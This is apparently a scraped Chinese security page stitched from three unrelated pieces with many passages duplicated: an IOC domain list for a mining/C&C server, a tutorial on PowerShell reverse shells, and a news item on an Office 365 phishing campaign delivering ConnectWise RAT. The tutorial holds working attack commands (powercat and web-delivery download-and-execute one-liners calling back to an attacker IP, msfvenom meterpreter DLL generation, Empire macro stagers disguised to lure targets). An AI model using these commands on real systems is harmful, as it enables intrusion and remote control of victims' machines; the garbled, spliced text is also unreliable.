IOC信息
矿池地址及C&C
后给出感染情况统计服务器88.99.66.31在2018年的历史解析,
最可以据此排查
矿池地址及C&C
后给出感染情况统计服务器88.99.66.31在2018年的历史解析,
最可以据此排查
imap.yip.su
mcm.iplogger.com
www.iplogger.co
api.iplogger.com
02ip.ru
enterpriseenrollment.iplogger.ru
iplogger.org
ezstat.ru
office.iplogger.com
blog.iplogger.org
corp.ezstat.ru
cdn-www.ezstat.ru
pub-my.iplogger.com
css.iplogger.ru
www.iplogger.ru
message.ezstat.ru
cdn-www.ezstat.ru
iplogger.co
yip.su
www.iplis.ru
www.iplogger.ru
devqa.iplogger.org
imap.iplogger.com
mail.ezstat.ru
docs.ezstat.ru
static.31.66.99.88.clients.your-server.de
superadmin.maper.info
2no.co
sentry.ezstat.ru
pages.ezstat.ru
m.iplogger.com
de.ezstat.ru
dwww.iplogger.org
iplogger.info
iplogger.blog
plus.ezstat.ru
promod.iplogger.org
api.ezstat.ru
yip.su
onelogin.ezstat.ru
mobile.iplogger.com
support02.maper.info
media2.iplogger.org
qa.ezstat.ru
dashboard.ezstat.ru
prx.ezstat.ru
ipgraber.ru
login.ezstat.ru
wldcrdrcrd.ezstat.ru
dr.iplogger.ru
iplo.ru
support02.maper.info
games.ezstat.ru
partners.ezstat.ru
alfa.maper.info
bes.ezstat.ru
qa.ezstat.ru
yip.su
blog.iplogger.org
jenkins.ezstat.ru
pma.deorg.ru
ease.iplogger.org
ftp.iplogger.com
devtest.iplogger.ru
antispam.iplogger.com
ease.iplogger.com
www.iplogger.org
www.ezstat.ru
apac.ezstat.ru
iplogger.info
awmdm.ezstat.ru
plus.ezstat.ru
pages.ezstat.ru
games.ezstat.ru
cs.ezstat.ru
beta.iplogger.ru
prd.iplogger.ru
aws.ezstat.ru
prix.iplogger.org
live.ezstat.ru
www.02ip.ru
mobicontrol.iplogger.com
vpc.ezstat.ru
powershell反弹shell常见方式
本文整理了通过powershell反弹shell的常见方式。利用powercat、dnscat2、nishang、Empire、PowerSploit、Metasploit、Cobalt strike、powershell自定义函数等方式反弹TCP/UDP/HTTP/HTTPS/ICMP/DNS等类型shell。
测试环境说明
攻击者:KALI2.0 32位 192.168.159.134
攻击者2:Ubuntu 14.04 LTS 192.168.159.129 (仅在dnscat2 反弹DNS shell中使用)
目标机:Windows Server 2008 X64 192.168.159.138
powercat反弹shell
powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat
攻击者(192.168.159.134)开启监听:
nc -lvp 6666
或者使用powercat监听
powercat -l -p 6666
目标机反弹cmd shell:
powershell IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 192.168.159.134 -p 6666 -e cmd
本文整理了通过powershell反弹shell的常见方式。利用powercat、dnscat2、nishang、Empire、PowerSploit、Metasploit、Cobalt strike、powershell自定义函数等方式反弹TCP/UDP/HTTP/HTTPS/ICMP/DNS等类型shell。
测试环境说明
攻击者:KALI2.0 32位 192.168.159.134
攻击者2:Ubuntu 14.04 LTS 192.168.159.129 (仅在dnscat2 反弹DNS shell中使用)
目标机:Windows Server 2008 X64 192.168.159.138
powercat反弹shell
powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat
攻击者(192.168.159.134)开启监听:
nc -lvp 6666
或者使用powercat监听
powercat -l -p 6666
目标机反弹cmd shell:
powershell IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 192.168.159.134 -p 6666 -e cmd
利用office 宏反弹shell
攻击者(192.168.159.134)开启监听:
uselistener http
execute
back
usestager windows/macro http #生成payload
execute
生成/tmp/macro 攻击代码后,新建一个word 创建宏
攻击者(192.168.159.134)开启监听:
uselistener http
execute
back
usestager windows/macro http #生成payload
execute
生成/tmp/macro 攻击代码后,新建一个word 创建宏
点击“文件”-“宏”-“创建”,删除自带的脚本,复制进去/tmp/macro文件内容,并保存为“Word 97-2003文档(.doc)”或者“启用宏的Word 文档(.docm)”文件,当诱导目标打开,执行宏后,即可成功反弹shell:
说明:需要开启宏或者用户手动启用宏。开启宏设置:“文件”-“选项”-“信任中心”,选择“启用所有宏”
说明:需要开启宏或者用户手动启用宏。开启宏设置:“文件”-“选项”-“信任中心”,选择“启用所有宏”
在word中“插入”-“对象”-“由文件创建” 处,插入launcher.bat文件,可更改文件名称和图标,进行伪装,当诱导目标点击launcher_lltest.xls文件,执行后,即可成功反弹shell
PowerSploit DLL注入反弹shell
PowerSploit是又一款基于powershell的后渗透攻击框架。PowerSploit包括Inject-Dll(注入dll到指定进程)、Inject-Shellcode(注入shellcode到执行进程)等功能。
利用msfvenom、metasploit和PowerSploit中的Invoke-DllInjection.ps1 实现dll注入,反弹shell
1)msfvenom生成dll后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.134 lport=6667 -f dll -o /var/www/html/PowerSploit/lltest.dll
说明:目标机64位 用x64 ; 32位的话用windows/meterpreter/reverse_tcp
metasploit 设置payload 开启监听
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.159.134
set LPORT 6667
exploit
PowerSploit是又一款基于powershell的后渗透攻击框架。PowerSploit包括Inject-Dll(注入dll到指定进程)、Inject-Shellcode(注入shellcode到执行进程)等功能。
利用msfvenom、metasploit和PowerSploit中的Invoke-DllInjection.ps1 实现dll注入,反弹shell
1)msfvenom生成dll后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.134 lport=6667 -f dll -o /var/www/html/PowerSploit/lltest.dll
说明:目标机64位 用x64 ; 32位的话用windows/meterpreter/reverse_tcp
metasploit 设置payload 开启监听
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.159.134
set LPORT 6667
exploit
metasploit反弹shell
利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell
攻击者(192.168.159.134)
利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell
攻击者(192.168.159.134)
目标机执行powershell payload:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.159.134:83/a'))"
6)成功反弹shell后,右键interact 进入shell
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.159.134:83/a'))"
6)成功反弹shell后,右键interact 进入shell
邮件攻击再升级:Microsoft Office 365 用户面临凭据窃取与恶意软件双重危机
一场复杂的网络攻击活动已经出现,攻击者采用双重威胁手段,既能同时窃取 Microsoft Office 365 的凭据,又能将恶意软件传递给毫无防备的受害者。
这种混合攻击始于伪装成来自合法文件共享服务的文件删除提醒的欺骗性电子邮件,营造出一种虚假的紧迫感,促使用户立即采取行动以保存所谓的重要文件。
此次攻击巧妙地利用了用户的信任,将合法的云存储平台 files.fm 作为其初始传播机制。
收件人会收到有关即将删除文件的警告,邮件主题行提及商业文件,促使他们点击超链接的文档名称,这些链接会将他们引导至真实的 files.fm 页面。
这种方式极大地提高了攻击的可信度,因为在感染链的早期阶段,用户是在与一个真实的文件共享服务进行交互。
Cofense 网络钓鱼防御中心(PDC)的研究人员发现了这一攻击活动,并指出了其特别阴险的 “二选一” 攻击方式。
在下载并打开共享的 PDF 文件后,用户会面临两个看似无害的选项:“预览” 或 “下载”—— 而每个选项都会导致不同但同样具有破坏性的后果。
这种分叉式的攻击路径通过提供多种入侵途径,将攻击成功率最大化。
当用户选择 “预览” 时,凭据窃取组件就会启动。这一操作会将受害者重定向到一个看似可信但实则欺诈的 Microsoft 登录页面,该页面与真实的 Microsoft 登录界面极为相似。
虽然该页面具有人们熟悉的 Microsoft 品牌元素,但也包含一些细微的不一致之处,比如非 Microsoft 域名的网址。
然而,这些警示信号在当时往往会被忽视,当用户尝试进行身份验证时,就会导致凭据被盗。
另一方面,选择 “下载” 则会触发伪装成 “SecuredOneDrive.ClientSetup.exe” 的恶意软件的安装。
这个可执行文件伪装成合法的 Microsoft 软件,而实际上会部署 ConnectWise 远程访问木马(ConnectWise RAT),这是一种恶意工具,它利用合法的远程管理软件来实现未经授权的系统访问。
一场复杂的网络攻击活动已经出现,攻击者采用双重威胁手段,既能同时窃取 Microsoft Office 365 的凭据,又能将恶意软件传递给毫无防备的受害者。
这种混合攻击始于伪装成来自合法文件共享服务的文件删除提醒的欺骗性电子邮件,营造出一种虚假的紧迫感,促使用户立即采取行动以保存所谓的重要文件。
此次攻击巧妙地利用了用户的信任,将合法的云存储平台 files.fm 作为其初始传播机制。
收件人会收到有关即将删除文件的警告,邮件主题行提及商业文件,促使他们点击超链接的文档名称,这些链接会将他们引导至真实的 files.fm 页面。
这种方式极大地提高了攻击的可信度,因为在感染链的早期阶段,用户是在与一个真实的文件共享服务进行交互。
Cofense 网络钓鱼防御中心(PDC)的研究人员发现了这一攻击活动,并指出了其特别阴险的 “二选一” 攻击方式。
在下载并打开共享的 PDF 文件后,用户会面临两个看似无害的选项:“预览” 或 “下载”—— 而每个选项都会导致不同但同样具有破坏性的后果。
这种分叉式的攻击路径通过提供多种入侵途径,将攻击成功率最大化。
当用户选择 “预览” 时,凭据窃取组件就会启动。这一操作会将受害者重定向到一个看似可信但实则欺诈的 Microsoft 登录页面,该页面与真实的 Microsoft 登录界面极为相似。
虽然该页面具有人们熟悉的 Microsoft 品牌元素,但也包含一些细微的不一致之处,比如非 Microsoft 域名的网址。
然而,这些警示信号在当时往往会被忽视,当用户尝试进行身份验证时,就会导致凭据被盗。
另一方面,选择 “下载” 则会触发伪装成 “SecuredOneDrive.ClientSetup.exe” 的恶意软件的安装。
这个可执行文件伪装成合法的 Microsoft 软件,而实际上会部署 ConnectWise 远程访问木马(ConnectWise RAT),这是一种恶意工具,它利用合法的远程管理软件来实现未经授权的系统访问。